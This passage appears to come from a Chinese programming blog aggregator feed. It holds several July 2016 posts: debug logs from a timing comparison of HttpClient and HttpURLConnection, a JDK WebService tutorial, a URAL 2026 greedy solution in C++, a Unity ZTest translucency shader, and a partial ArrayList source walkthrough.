2016-07-31 00:24:46,747 DEBUG [org.apache.commons.httpclient.HttpMethodBase] - Adding Host request header
2016-07-31 00:24:46,871 DEBUG [org.apache.commons.httpclient.HttpMethodBase] - Default charset used: UTF-8
2016-07-31 00:24:46,900 DEBUG [org.apache.commons.httpclient.HttpMethodBase] - Default charset used: UTF-8
2016-07-31 00:24:46,902 DEBUG [httpclient.wire.header] - >> "User-Agent: Jakarta Commons-HttpClient/3.1[\r][\n]"
2016-07-31 00:24:46,903 DEBUG [httpclient.wire.header] - >> "Host: 192.168.2.111:8088[\r][\n]"
2016-07-31 00:24:46,903 DEBUG [httpclient.wire.header] - >> "Content-Length: 10[\r][\n]"
2016-07-31 00:24:46,903 DEBUG [httpclient.wire.header] - >> "Content-Type: application/x-www-form-urlencoded[\r][\n]"
2016-07-31 00:24:46,907 DEBUG [httpclient.wire.header] - >> "[\r][\n]"
2016-07-31 00:24:46,911 DEBUG [httpclient.wire.content] - >> "userId=100"
2016-07-31 00:24:46,913 DEBUG [org.apache.commons.httpclient.methods.EntityEnclosingMethod] - Request body sent
2016-07-31 00:24:47,041 DEBUG [org.mybatis.spring.SqlSessionUtils] - Creating a new SqlSession
2016-07-31 00:24:47,074 DEBUG [org.mybatis.spring.SqlSessionUtils] - SqlSession [org.apache.ibatis.session.defaults.DefaultSqlSession@631e7edd] was not registered for synchronization because synchronization is not active
2016-07-31 00:24:47,168 DEBUG [org.mybatis.spring.transaction.SpringManagedTransaction] - JDBC Connection [com.alibaba.druid.proxy.jdbc.ConnectionProxyImpl@155b4677] will not be managed by Spring
2016-07-31 00:24:47,197 DEBUG [com.cn.eagle.dao.UserMapper.selectByPrimaryKey] - ==>  Preparing: select id, user_name, password, age from user where id = ? 
2016-07-31 00:24:47,756 DEBUG [com.cn.eagle.dao.UserMapper.selectByPrimaryKey] - ==> Parameters: 100(Integer)
2016-07-31 00:24:47,848 DEBUG [com.cn.eagle.dao.UserMapper.selectByPrimaryKey] - <==      Total: 1
2016-07-31 00:24:47,852 DEBUG [com.alibaba.druid.pool.PreparedStatementPool] - {conn-10001, pstmt-20000} enter cache
2016-07-31 00:24:47,854 DEBUG [org.mybatis.spring.SqlSessionUtils] - Closing non transactional SqlSession [org.apache.ibatis.session.defaults.DefaultSqlSession@631e7edd]
2016-07-31 00:24:48,085 DEBUG [httpclient.wire.header] - << "HTTP/1.1 200 OK[\r][\n]"
2016-07-31 00:24:48,086 DEBUG [httpclient.wire.header] - << "HTTP/1.1 200 OK[\r][\n]"
2016-07-31 00:24:48,089 DEBUG [httpclient.wire.header] - << "Server: Apache-Coyote/1.1[\r][\n]"
2016-07-31 00:24:48,090 DEBUG [httpclient.wire.header] - << "Content-Type: text/html;charset=UTF-8[\r][\n]"
2016-07-31 00:24:48,090 DEBUG [httpclient.wire.header] - << "Content-Length: 67[\r][\n]"
2016-07-31 00:24:48,090 DEBUG [httpclient.wire.header] - << "Date: Sat, 30 Jul 2016 16:24:48 GMT[\r][\n]"
2016-07-31 00:24:48,091 DEBUG [httpclient.wire.header] - << "[\r][\n]"
2016-07-31 00:24:48,095 DEBUG [org.apache.commons.httpclient.HttpMethodBase] - Buffering response body
2016-07-31 00:24:48,095 DEBUG [httpclient.wire.content] - << "{"id":100,"userName":"admin[0xe7][0xae][0xa1][0xe7][0x90][0x86][0xe5][0x91][0x98]","password":"123456","age":25}"
2016-07-31 00:24:48,097 DEBUG [org.apache.commons.httpclient.HttpMethodBase] - Resorting to protocol version default close connection policy
2016-07-31 00:24:48,097 DEBUG [org.apache.commons.httpclient.HttpMethodBase] - Should NOT close connection, using HTTP/1.1
2016-07-31 00:24:48,098 DEBUG [org.apache.commons.httpclient.HttpConnection] - Releasing connection back to connection manager.
{"id":100,"userName":"admin管理员","password":"123456","age":25}
testHttpURlConnection
2016-07-31 00:24:48,127 DEBUG [org.mybatis.spring.SqlSessionUtils] - Creating a new SqlSession
2016-07-31 00:24:48,129 DEBUG [org.mybatis.spring.SqlSessionUtils] - SqlSession [org.apache.ibatis.session.defaults.DefaultSqlSession@1ee42c08] was not registered for synchronization because synchronization is not active
2016-07-31 00:24:48,129 DEBUG [org.mybatis.spring.transaction.SpringManagedTransaction] - JDBC Connection [com.alibaba.druid.proxy.jdbc.ConnectionProxyImpl@155b4677] will not be managed by Spring
2016-07-31 00:24:48,130 DEBUG [com.cn.eagle.dao.UserMapper.selectByPrimaryKey] - ==>  Preparing: select id, user_name, password, age from user where id = ? 
2016-07-31 00:24:48,131 DEBUG [com.cn.eagle.dao.UserMapper.selectByPrimaryKey] - ==> Parameters: 100(Integer)
2016-07-31 00:24:48,137 DEBUG [com.cn.eagle.dao.UserMapper.selectByPrimaryKey] - <==      Total: 1
2016-07-31 00:24:48,138 DEBUG [org.mybatis.spring.SqlSessionUtils] - Closing non transactional SqlSession [org.apache.ibatis.session.defaults.DefaultSqlSession@1ee42c08]
{"id":100,"userName":"admin管理员","password":"123456","age":25}
1598 58

第一次执行后：

testHttpClient()用时：1598

testHttpURlConnection()用时：58

第二次执行testHttp方法后控制台信息：

testHttpClient
2016-07-31 00:28:09,582 DEBUG [org.apache.commons.httpclient.params.DefaultHttpParams] - Set parameter http.connection.timeout = 30000
2016-07-31 00:28:09,582 DEBUG [org.apache.commons.httpclient.params.DefaultHttpParams] - Set parameter http.protocol.content-charset = UTF-8
2016-07-31 00:28:09,583 DEBUG [org.apache.commons.httpclient.HttpConnection] - Open connection to 192.168.2.111:8088
2016-07-31 00:28:09,586 DEBUG [httpclient.wire.header] - >> "POST /era/user/getUserById HTTP/1.1[\r][\n]"
2016-07-31 00:28:09,587 DEBUG [org.apache.commons.httpclient.HttpMethodBase] - Adding Host request header
2016-07-31 00:28:09,587 DEBUG [org.apache.commons.httpclient.HttpMethodBase] - Default charset used: UTF-8
2016-07-31 00:28:09,590 DEBUG [org.apache.commons.httpclient.HttpMethodBase] - Default charset used: UTF-8
2016-07-31 00:28:09,591 DEBUG [httpclient.wire.header] - >> "User-Agent: Jakarta Commons-HttpClient/3.1[\r][\n]"
2016-07-31 00:28:09,592 DEBUG [httpclient.wire.header] - >> "Host: 192.168.2.111:8088[\r][\n]"
2016-07-31 00:28:09,592 DEBUG [httpclient.wire.header] - >> "Content-Length: 10[\r][\n]"
2016-07-31 00:28:09,593 DEBUG [httpclient.wire.header] - >> "Content-Type: application/x-www-form-urlencoded[\r][\n]"
2016-07-31 00:28:09,593 DEBUG [httpclient.wire.header] - >> "[\r][\n]"
2016-07-31 00:28:09,593 DEBUG [httpclient.wire.content] - >> "userId=100"
2016-07-31 00:28:09,594 DEBUG [org.apache.commons.httpclient.methods.EntityEnclosingMethod] - Request body sent
2016-07-31 00:28:09,601 DEBUG [org.mybatis.spring.SqlSessionUtils] - Creating a new SqlSession
2016-07-31 00:28:09,602 DEBUG [org.mybatis.spring.SqlSessionUtils] - SqlSession [org.apache.ibatis.session.defaults.DefaultSqlSession@240543cf] was not registered for synchronization because synchronization is not active
2016-07-31 00:28:09,603 DEBUG [org.mybatis.spring.transaction.SpringManagedTransaction] - JDBC Connection [com.alibaba.druid.proxy.jdbc.ConnectionProxyImpl@155b4677] will not be managed by Spring
2016-07-31 00:28:09,605 DEBUG [com.cn.eagle.dao.UserMapper.selectByPrimaryKey] - ==>  Preparing: select id, user_name, password, age from user where id = ? 
2016-07-31 00:28:09,606 DEBUG [com.cn.eagle.dao.UserMapper.selectByPrimaryKey] - ==> Parameters: 100(Integer)
2016-07-31 00:28:09,611 DEBUG [com.cn.eagle.dao.UserMapper.selectByPrimaryKey] - <==      Total: 1
2016-07-31 00:28:09,612 DEBUG [org.mybatis.spring.SqlSessionUtils] - Closing non transactional SqlSession [org.apache.ibatis.session.defaults.DefaultSqlSession@240543cf]
2016-07-31 00:28:09,616 DEBUG [httpclient.wire.header] - << "HTTP/1.1 200 OK[\r][\n]"
2016-07-31 00:28:09,617 DEBUG [httpclient.wire.header] - << "HTTP/1.1 200 OK[\r][\n]"
2016-07-31 00:28:09,617 DEBUG [httpclient.wire.header] - << "Server: Apache-Coyote/1.1[\r][\n]"
2016-07-31 00:28:09,617 DEBUG [httpclient.wire.header] - << "Content-Type: text/html;charset=UTF-8[\r][\n]"
2016-07-31 00:28:09,618 DEBUG [httpclient.wire.header] - << "Content-Length: 67[\r][\n]"
2016-07-31 00:28:09,618 DEBUG [httpclient.wire.header] - << "Date: Sat, 30 Jul 2016 16:28:09 GMT[\r][\n]"
2016-07-31 00:28:09,618 DEBUG [httpclient.wire.header] - << "[\r][\n]"
2016-07-31 00:28:09,618 DEBUG [org.apache.commons.httpclient.HttpMethodBase] - Buffering response body
2016-07-31 00:28:09,619 DEBUG [httpclient.wire.content] - << "{"id":100,"userName":"admin[0xe7][0xae][0xa1][0xe7][0x90][0x86][0xe5][0x91][0x98]","password":"123456","age":25}"
2016-07-31 00:28:09,619 DEBUG [org.apache.commons.httpclient.HttpMethodBase] - Resorting to protocol version default close connection policy
2016-07-31 00:28:09,619 DEBUG [org.apache.commons.httpclient.HttpMethodBase] - Should NOT close connection, using HTTP/1.1
2016-07-31 00:28:09,620 DEBUG [org.apache.commons.httpclient.HttpConnection] - Releasing connection back to connection manager.
{"id":100,"userName":"admin管理员","password":"123456","age":25}
testHttpURlConnection
2016-07-31 00:28:09,629 DEBUG [org.mybatis.spring.SqlSessionUtils] - Creating a new SqlSession
2016-07-31 00:28:09,630 DEBUG [org.mybatis.spring.SqlSessionUtils] - SqlSession [org.apache.ibatis.session.defaults.DefaultSqlSession@4636317d] was not registered for synchronization because synchronization is not active
2016-07-31 00:28:09,631 DEBUG [org.mybatis.spring.transaction.SpringManagedTransaction] - JDBC Connection [com.alibaba.druid.proxy.jdbc.ConnectionProxyImpl@155b4677] will not be managed by Spring
2016-07-31 00:28:09,631 DEBUG [com.cn.eagle.dao.UserMapper.selectByPrimaryKey] - ==>  Preparing: select id, user_name, password, age from user where id = ? 
2016-07-31 00:28:09,632 DEBUG [com.cn.eagle.dao.UserMapper.selectByPrimaryKey] - ==> Parameters: 100(Integer)
2016-07-31 00:28:09,637 DEBUG [com.cn.eagle.dao.UserMapper.selectByPrimaryKey] - <==      Total: 1
2016-07-31 00:28:09,640 DEBUG [org.mybatis.spring.SqlSessionUtils] - Closing non transactional SqlSession [org.apache.ibatis.session.defaults.DefaultSqlSession@4636317d]
{"id":100,"userName":"admin管理员","password":"123456","age":25}
39 25

第二次执行后：

testHttpClient()用时：39

testHttpURlConnection()用时：25

总的来说，在大压力或者连续不断发请求的情况下，HttpClient不会比HttpURLConnection慢多少，因为保持了底层的Socket连接，不用每次都重新连接。

作者：aqsunkai 发表于2016/7/31 0:37:19 原文链接

阅读：3 评论：0 查看评论

↧

原生WebService开发(服务端 / 使用JDK工具自动生成客户端)

July 31, 2016, 12:43 am

≫ Next: URAL 2026 Dean and Schedule 贪心、双端队列(deque)、队列(queue)

≪ Previous: HTTPClient和HttpURLConnection实例对比

第一次写WebService是一年前的事情了,虽然代码还留着,但是开发的过程已经忘记了,为什么说,过程忘记了? 因为这里面有一些关键点,当时没有记录下来.

最近又在看项目,正好有WebService,所以,捡起来复习下.写个Demo.

这个Demo不会用到任何的WebService框架,比如像CXF之类的...以后有空可以写一个....

先来个项目结构图吧.

如图所示,一共三个类.

一个接口,一个接口实现类,一个发布WebService的主方法.

看代码吧.

看着,在接口类上,需要加上@WebService 注解.

在类方法上面,需要加上@WebMethod注解.

package com.test.webservice;

import javax.jws.WebMethod;
import javax.jws.WebService;

@WebService
public interface WebServiceServerInterface {
	@WebMethod
	public String sayHello(String name);
	
}

接口实现

随便写一个了,能明白就行.

在接口实现的类上,依旧需要加上@WebService注解

不过方法上面,就不用再加注解了.

package com.test.webservice;

import javax.jws.WebService;

@WebService
public class WebServiceServerImpl implements WebServiceServerInterface {

	@Override
	public String sayHello(String name) {
		System.out.println("Server : " + name);
		return "Hello " + name;
	}

}

然后写一个Main方法,使用JDK的一个Endpoint类,来发布WebService.

注意: Endpoint.publish(),

这个方法,接收两个参数.

第一个参数是WebService发布的路径address,端口号后面的看自己心情,随便加,最后的方法名,也是看心情.

第二个参数是接口的实现类对象.

package com.test.webservice;

import javax.xml.ws.Endpoint;

public class Main {
	public static void main(String[] args) {
		String address = "http://localhost:8088/WebServiceDemo/sayHello";
		Endpoint.publish(address, new WebServiceServerImpl());
		System.out.println("WebService Server 发布成功");
	}
}

启动main方法,即可....这个程序会一直跑下去....你看那个小红方块....

接下来,我们使用Eclipse自带的工具,模拟客户端进行调用.

这里要注意,(最好)Eclipse 在Java EE的工作空间下...

打开那个"地球"的按钮...open web browser,在地址栏上输入我们发布的WebService地址

注意啊,这里输入的URL,需要在发布地址的后面,加上"?wsdl"这个后缀,否则会出现"无法显示此页"

出现了这篇WSDL文档,说明服务端已经成功的发布好了....

然后我们打开"地球"按钮旁边的那个按钮 "Launch the web Service explorer"

按照图片中,标注的顺序一个一个按....

然后在输入框中输入发布的WebService地址....

按 go...

啦啦啦啦....出现了....

然后咱们点击 Operation 下面的那个sayHello 方法.....

然后

然后就有结果了....

模拟客户端调用服务端....

好了,上面说的是Eclipse自带的模拟客户端....

但是真的要写客户端应该怎么搞????

准备工作...首先你的电脑需要配置JDK环境变量....

其次提醒下....WebService 发布的Main方法,不要关闭啊....

在JDK的bin目录下面...有一个wsimport.exe这个程序...咱们利用这个程序,为我们生成WebService的客户端....

首先创建一个WebService Client 客户端....

我这里以Windos系统为例,如果你是Linux,我还真不会了...再去Google下看看....

打开Dos命令行....就是cmd...

然后在dos命令下,进入WebService Client 客户端的src文件夹下面....

就像这样子....

接下来就是见证奇迹的时刻啦.....

在命令行中输入 wsimport -keep +你发布的WebService的URL

就像这样子.....

记得地址后面要加上?wsdl

然后你再刷新下你的WebService Client客户端代码....是不是多了些什么???

那么问题来了...这么多的类,我特么应该调用哪个???

现在咱们去看看WSDL文档....

在这个文档的下面....

有一个<service>标签....这个标签,就是咱们需要调用的类...在上面的类中,也是能找到的,是不是....

<service>标签下面的<port>标签,就是服务端给我们提供的方法....

然后咱们来写个客户端代码调用一下.....

这里我先创建service对象...

然后用service对象,调用port方法...

你们在写代码的要注意下...你看看他返回的是什么东西...

他返回的就是一个接口.....

然后咱们通过接口去调用服务端提供的方法...

结束了.....

作者：Simba_cheng 发表于2016/7/31 0:43:01 原文链接

阅读：4 评论：0 查看评论

↧

URAL 2026 Dean and Schedule 贪心、双端队列(deque)、队列(queue)

July 31, 2016, 12:44 am

≫ Next: Unity Shaders and Effects Cookbook (D-1) 设置 ZTest 来实现遮挡半透效果

≪ Previous: 原生WebService开发(服务端 / 使用JDK工具自动生成客户端)

C - Dean and Schedule

Time Limit:1000MS Memory Limit:65536KB 64bit IO Format:%I64d & %I64u

Submit Status Practice URAL 2026

Description

A new academic year approaches, and the dean must make a schedule of classes for first-year students. There must be n classes in the schedule. The dean should take into account the following interesting observation made in recent years: students skip all classes with

even numbers and attend all classes with odd numbers (the classes are numbered from 1). Of course the dean wants students to attend

as many important classes as possible, so he tries to assign subjects that are more important to places with odd numbers and subjects

that are less important to places with even numbers. The method of estimating the quality of the schedule at the Department of Mathematics and Mechanics must be as formal as possible.

The first-year schedule may contain any of 26 subjects taught at the department. We denote them by English letters from a to z. The importance of a subject corresponds to its position in the English alphabet. Thus, subject a has importance 1, and subject z has importance 26. The quality of a schedule is the sum of importances of subjects in it, where subjects on odd places are counted with a

plus sign, and subjects on even places are counted with a minus sign.

Unfortunately, a shedule has some restrictions due to administrative reasons. First, the schedule must contain at least k different

subjects, so the dean cannot occupy all odd places with mathematical analysis and all even places with philosophy. Second, certain subjects must be assigned to certain places. Help the dean to make a schedule of maximum quality under these restrictions.

Input

The first line contains a string of length n (1 ≤ n ≤ 10 ⁵) consisting of lowercase English letters and question marks. The string

specifies the subjects that are already in the schedule. The letters denote these subjects, and the question marks stand for vacant places.

In the second line you are given an integer k (1 ≤ k ≤ 26), which is the minimum number of different subjects in the schedule.

Output

If it is impossible to replace all question marks by lowercase English letters so that the string would contain at least k different letters, output “-1” (without quotation marks). Otherwise, output any of the resulting strings that maximizes the quality of the schedule given by the string.

Sample Input

input	output
?? 1	za
?? 3	-1
aza 1	aza
aza 3	-1

Notes

In the first sample the dean can make any schedule with two subjects (even identical), but the quality of the schedule “za” is 26 − 1 = 25, and this is the maximum possible value of the quality.

In the second sample it is impossible to make a schedule consisting of two classes with three different subjects.

In the third sample the dean has only one variant. Though the schedule is bad (1 − 26 + 1 = −24), nothing better can be proposed.

In the fourth sample the only possible variant doesn’t contain three different subjects.

Source

UESTC 2016 Summer Training #17 Div.2

URAL 2026

My Solution

贪心，双端队列、队列

先扫一遍记录各种字母出现的次数，然后在扫一遍字母数组(从大到小)，依次记录没有出现过的字母

然后扫一遍分别记录奇数位置的'?' qo.push(i), 偶数位置的'?' qe.push(i) 同时如果'?'的个数 + 已经出现的种类数 < k 则输出 -1

否则就可以了，然后每次 if(26 - deq.front() > deq.back()) 来判断应该填优先填 minus的位置还是 plus的位置，(同时应该先判断是否容器为空)

具体见代码

复杂度 O(n)

#include <iostream>
#include <cstdio>
#include <cstring>
#include <deque>
#include <queue>
using namespace std;
typedef long long LL;
const int maxn = 1e5 + 8;

char val[maxn];
int letter[26];

deque<int> deq;
queue<int> qe, qo;
int main()
{
    #ifdef LOCAL
    freopen("a.txt", "r", stdin);
    //freopen("b.txt", "w", stdout);
    int T = 5;
    while(T--){
    #endif // LOCAL
    memset(letter, 0, sizeof letter);
    int k, len, sz = 0, cnte = 0, cnto = 0;
    scanf("%s", val);
    len = strlen(val);
    scanf("%d", &k);
    for(int i = 0; i < len; i++){
        if(val[i] != '?'){
            letter[val[i] - 'a']++;
            if(letter[val[i] - 'a'] == 1) sz++;
        }
        else{
            if(i&1) qe.push(i);
            else qo.push(i);
        }
    }
    cnte = qe.size(), cnto = qo.size();
    //cout<<cnte<<" "<<cnto<<endl;
    if(sz + cnte + cnto < k) printf("-1");
    else if(cnte + cnto == 0) printf("%s", val);
    else{
            //cout<<cnt<<endl;
        for(int j = 26 - 1; j >= 0; j--){
            if(letter[j] == 0) deq.push_back(j);
        }
        while(sz < k){
            if(26 - deq.front() > deq.back()){
                if(!qe.empty()){
                    val[qe.front()] = (deq.back() + 'a');
                    deq.pop_back();
                    qe.pop();
                    sz++;
                }
                else{
                    val[qo.front()] = (deq.front() + 'a');
                    deq.pop_front();
                    qo.pop();
                    sz++;
                }
            }
            else{
                if(!qo.empty()){
                    val[qo.front()] = (deq.front() + 'a');
                    deq.pop_front();
                    qo.pop();
                    sz++;
                }
                else{
                    val[qe.front()] = (deq.back() + 'a');
                    deq.pop_back();
                    qe.pop();
                    sz++;
                }
            }
        }

        while(!qo.empty()){
            val[qo.front()] = 'z';
            qo.pop();
        }
        while(!qe.empty()){
            val[qe.front()] = 'a';
            qe.pop();
        }

        printf("%s", val);

    }
    #ifdef LOCAL
    printf("\n");
    deq.clear();
    while(!qe.empty()) qe.pop();
    while(!qo.empty()) qo.pop();
    }
    #endif // LOCAL
    return 0;
}

Thank you!

------from ProLights

作者：ProLightsfxjh 发表于2016/7/31 0:44:11 原文链接

阅读：26 评论：0 查看评论

↧

Unity Shaders and Effects Cookbook (D-1) 设置 ZTest 来实现遮挡半透效果

July 31, 2016, 1:18 am

≫ Next: Java源码学习--ArrayList源码解析

≪ Previous: URAL 2026 Dean and Schedule 贪心、双端队列(deque)、队列(queue)

在游戏里面经常看到这样的效果，英雄走到障碍物后面，但是我们能够透过障碍物看到英雄的身体，好像我们有了透视眼一般。

都是套路。

其实是程序猿在显示英雄模型的时候，画了两次。

一次是被遮挡的部分用半透明的样子画了一遍。

另一次是没有遮挡的部分画了一遍。

下面在Unity中来实现。

首先新建材质、Shader、场景。

搭建好场景，一个Cube、一个Capsule

好了，现在是最正常不过的情况了，Capsule被Cube 挡住了。

转自http://blog.csdn.net/huutu http://www.thisisgame.com.cn

下面修改一下 Shader。

Shader "CookBookShaders/Cover Translucent" {
	Properties {
		_MainTex ("Base (RGB)", 2D) = "white" {}
	}
	SubShader {
		Tags { "RenderType"="Opaque"}
		LOD 200
		
		ZWrite On
		ZTest greater  //Greater/GEqual/Less/LEqual/Equal/NotEqual/Always/Never/Off 默认是LEqual 如果要绘制的像素的Z值 小余等于深度缓冲区中的值，那么就用新的像素颜色值替换。这里使用 Greater，代表如果当前要渲染的像素 Z值大于 缓冲区中的Z，才渲染，也就是后面的物体覆盖了前面的。
		CGPROGRAM
		#pragma surface surf Lambert

		sampler2D _MainTex;

		struct Input {
			float2 uv_MainTex;
		};

		void surf (Input IN, inout SurfaceOutput o) {
			half4 c = tex2D (_MainTex, IN.uv_MainTex);
			o.Albedo = c.rgb;
			o.Alpha = c.a;
		}
		ENDCG
	} 
	FallBack "Diffuse"
}

只是在 CGPROGRAM 之前加了两句话，设置了两个东西

ZWrite On
ZTest greater

ZWrite 代表是否将深度写入深度缓冲中，默认是 On

ZTest 代表通过通过判断深度，来决定当前像素的颜色是否写入颜色缓冲，即是否要用当前像素颜色替换掉之前的像素颜色。

取值有以下几种：

Greater/GEqual/Less/LEqual/Equal/NotEqual/Always/Never/Off

默认是LEqual 如果要绘制的像素的Z值小余等于深度缓冲区中的值，那么就用新的像素颜色值替换。

这里使用 Greater，代表如果当前要渲染的像素 Z值大于缓冲区中的Z，才渲染，也就是后面的物体覆盖了前面的。

现在得到如下效果：

这就是第一次的绘制，把后面的Capsule 覆盖掉了前面的Cube。

那下面开始第二次绘制，也就是没有被遮挡的。

既然是没有被遮挡的，那只要按照最普通的方法就可以了，

Shader "CookBookShaders/Cover Translucent" {
	Properties {
		_MainTex ("Base (RGB)", 2D) = "white" {}
	}
	SubShader {
		Tags { "RenderType"="Opaque"}
		LOD 200
		
		ZWrite On
		ZTest greater  //Greater/GEqual/Less/LEqual/Equal/NotEqual/Always/Never/Off 默认是LEqual 如果要绘制的像素的Z值 小余等于深度缓冲区中的值，那么就用新的像素颜色值替换。这里使用 Greater，代表如果当前要渲染的像素 Z值大于 缓冲区中的Z，才渲染，也就是后面的物体覆盖了前面的。
		CGPROGRAM
		#pragma surface surf Lambert

		sampler2D _MainTex;

		struct Input {
			float2 uv_MainTex;
		};

		void surf (Input IN, inout SurfaceOutput o) {
			half4 c = tex2D (_MainTex, IN.uv_MainTex);
			o.Albedo = c.rgb;
			o.Alpha = c.a;
		}
		ENDCG
		
		//上面设置了ZTest greater后，只有被遮挡的地方才渲染出来。所以下面把没有遮挡的地方渲染出来。
		ZWrite On
		ZTest LEqual  //Greater/GEqual/Less/LEqual/Equal/NotEqual/Always/Never/Off 默认是LEqual 如果要绘制的像素的Z值 小余等于深度缓冲区中的值，那么就用新的像素颜色值替换。这里使用 Greater，代表如果当前要渲染的像素 Z值大于 缓冲区中的Z，才渲染，也就是后面的物体覆盖了前面的。
		CGPROGRAM
		#pragma surface surf Lambert

		sampler2D _MainTex;

		struct Input {
			float2 uv_MainTex;
		};

		void surf (Input IN, inout SurfaceOutput o) {
			half4 c = tex2D (_MainTex, IN.uv_MainTex);
			o.Albedo = c.rgb;
			o.Alpha = c.a;
		}
		ENDCG
	} 
	FallBack "Diffuse"
}

转自http://blog.csdn.net/huutu http://www.thisisgame.com.cn

现在效果是这样的

看起来像是Capsule 在 Cube前面了，Shader实现的效果就是这个，但是我们不能用这个放到游戏中，因为会产生很多误解的。。。

我们来把被遮挡的这一部分，设置为透明，实现类似于LOL 躲草丛的效果。

下面要修改第一次绘制的代码，把它变为透明。

既然要做透明，那么要加上 alpha 的tag才行，然后设置 Alpha。

最终修改如下

Shader "CookBookShaders/Cover Translucent" {
	Properties {
		_MainTex ("Base (RGB)", 2D) = "white" {}
	}
	SubShader {
		Tags { "RenderType"="Opaque"}
		LOD 200
		
		ZWrite On
		ZTest greater  //Greater/GEqual/Less/LEqual/Equal/NotEqual/Always/Never/Off 默认是LEqual 如果要绘制的像素的Z值 小余等于深度缓冲区中的值，那么就用新的像素颜色值替换。这里使用 Greater，代表如果当前要渲染的像素 Z值大于 缓冲区中的Z，才渲染，也就是后面的物体覆盖了前面的。
		CGPROGRAM
		#pragma surface surf Lambert alpha 
		//加上alpha让被遮挡的这部分透明显示

		sampler2D _MainTex;

		struct Input {
			float2 uv_MainTex;
		};

		void surf (Input IN, inout SurfaceOutput o) {
			half4 c = tex2D (_MainTex, IN.uv_MainTex);
			o.Albedo = c.rgb;
			o.Alpha = 0.5f; //设置Alpha为0.5
		}
		ENDCG
		
		//上面设置了ZTest greater后，只有被遮挡的地方才渲染出来。所以下面把没有遮挡的地方渲染出来。
		ZWrite On
		ZTest LEqual  //Greater/GEqual/Less/LEqual/Equal/NotEqual/Always/Never/Off 默认是LEqual 如果要绘制的像素的Z值 小余等于深度缓冲区中的值，那么就用新的像素颜色值替换。
		CGPROGRAM
		#pragma surface surf Lambert

		sampler2D _MainTex;

		struct Input {
			float2 uv_MainTex;
		};

		void surf (Input IN, inout SurfaceOutput o) {
			half4 c = tex2D (_MainTex, IN.uv_MainTex);
			o.Albedo = c.rgb;
			o.Alpha = c.a;
		}
		ENDCG
	} 
	FallBack "Diffuse"
}

最终效果转自http://blog.csdn.net/huutu http://www.thisisgame.com.cn

示例工程下载：

http://pan.baidu.com/s/1pKT17sf

作者：cp790621656 发表于2016/7/31 1:18:16 原文链接

阅读：32 评论：0 查看评论

↧

Java源码学习--ArrayList源码解析

August 1, 2016, 2:23 am

≫ Next: Android实现ListView过滤功能之继承BaseAdapter进阶版

≪ Previous: Unity Shaders and Effects Cookbook (D-1) 设置 ZTest 来实现遮挡半透效果

ArrayList类中全局变量的意义

/**
     * The array buffer into which the elements of the ArrayList are stored.
     * The capacity of the ArrayList is the length of this array buffer.
     */
    private transient Object[] elementData; //存放值的数组

/**
     * The size of the ArrayList (the number of elements it contains).
     *
     * @serial
     */
    private int size; //数组中元素的个数

/**
     * The maximum size of array to allocate.
     * Some VMs reserve some header words in an array.
     * Attempts to allocate larger arrays may result in
     * OutOfMemoryError: Requested array size exceeds VM limit
     */
    private static final int MAX_ARRAY_SIZE = Integer.MAX_VALUE - 8; //数组的临界点-8

ArrayList的构造方法
创建一个ArrayList对象，不带参数的时候是创建了一个长度为10的Object数组带int类型参数的时候就是创建指定长度的Object数组带Collection类型的构造方法，指明该ArrayList是什么类型的数组

/**
     * Constructs an empty list with an initial capacity of ten.
     */
    public ArrayList() {
        this(10);
    }

/**
     * Constructs an empty list with the specified initial capacity.
     *
     * @param  initialCapacity  the initial capacity of the list
     * @throws IllegalArgumentException if the specified initial capacity
     *         is negative
     */
    public ArrayList(int initialCapacity) {
        super();
        if (initialCapacity < 0)
            throw new IllegalArgumentException("Illegal Capacity: "+
                                               initialCapacity);
        this.elementData = new Object[initialCapacity];
    }

/**
     * Constructs a list containing the elements of the specified
     * collection, in the order they are returned by the collection's
     * iterator.
     *
     * @param c the collection whose elements are to be placed into this list
     * @throws NullPointerException if the specified collection is null
     */
    public ArrayList(Collection<? extends E> c) {
        elementData = c.toArray();
        size = elementData.length;
        // c.toArray might (incorrectly) not return Object[] (see 6260652)
        if (elementData.getClass() != Object[].class)
            elementData = Arrays.copyOf(elementData, size, Object[].class);
    }

常用的方法

1). Arrays.copyOf(T[] original, int newLength) 此方法是创建一个新数组返回，并且将原有数组中的值复制到新数组中

public static <T> T[] copyOf(T[] original, int newLength) {
        return (T[]) copyOf(original, newLength, original.getClass());
    }

public static <T,U> T[] copyOf(U[] original, int newLength, Class<? extends T[]> newType) {
        T[] copy = ((Object)newType == (Object)Object[].class)
            ? (T[]) new Object[newLength]
            : (T[]) Array.newInstance(newType.getComponentType(), newLength);
        System.arraycopy(original, 0, copy, 0,
                         Math.min(original.length, newLength));
        return copy;
    }

2). System.arraycopy(Object src, int srcPos,Object dest, int destPos, int length); 该方法被标记了native，调用了系统的C/C++代码，在JDK中是看不到的，但在openJDK中可以看到其源码。该函数实际上最终调用了C语言的memmove()函数，因此它可以保证同一个数组内元素的正确复制和移动，比一般的复制方法的实现效率要高很多，很适合用来批量处理数组。Java强烈推荐在复制大量数组元素时用该方法，以取得更高的效率。方法的参数的含义
第一个是要复制的数组，第二个是从要复制的数组的第几个开始，第三个是复制到那，四个是复制到的数组第几个开始，最后一个是复制长度

public static native void arraycopy(Object src,  int  srcPos,
                                        Object dest, int destPos,
                                        int length);

trimToSize()方法
此方法是将数组中的元素个数做为数组的长度生成一个新的数组，并将新数组内存地址指向当前集合，将多余的空间释放

/**
     * Trims the capacity of this <tt>ArrayList</tt> instance to be the
     * list's current size.  An application can use this operation to minimize
     * the storage of an <tt>ArrayList</tt> instance.
     */
    public void trimToSize() {
        modCount++;
        int oldCapacity = elementData.length;
        if (size < oldCapacity) {
            elementData = Arrays.copyOf(elementData, size);
        }
    }

size()方法
int返回值返回数组中元素的个数

/**
     * Returns the number of elements in this list.
     *
     * @return the number of elements in this list
     */
    public int size() {
        return size;
    }

isEmpty()方法
boolean返回值，返回当前数组的的个数是否等于0 等于0为true 否则为false

/**
     * Returns <tt>true</tt> if this list contains no elements.
     *
     * @return <tt>true</tt> if this list contains no elements
     */
    public boolean isEmpty() {
        return size == 0;
    }

contains(Object o)方法
boolean返回值此方法的原理是调用indexOf(Object o)之后判断返回值是否>=0,具体的后面将indexOf时详细讲解

/**
     * Returns <tt>true</tt> if this list contains the specified element.
     * More formally, returns <tt>true</tt> if and only if this list contains
     * at least one element <tt>e</tt> such that
     * <tt>(o==null&nbsp;?&nbsp;e==null&nbsp;:&nbsp;o.equals(e))</tt>.
     *
     * @param o element whose presence in this list is to be tested
     * @return <tt>true</tt> if this list contains the specified element
     */
    public boolean contains(Object o) {
        return indexOf(o) >= 0;
    }

indexOf(Object o)方法正序比较
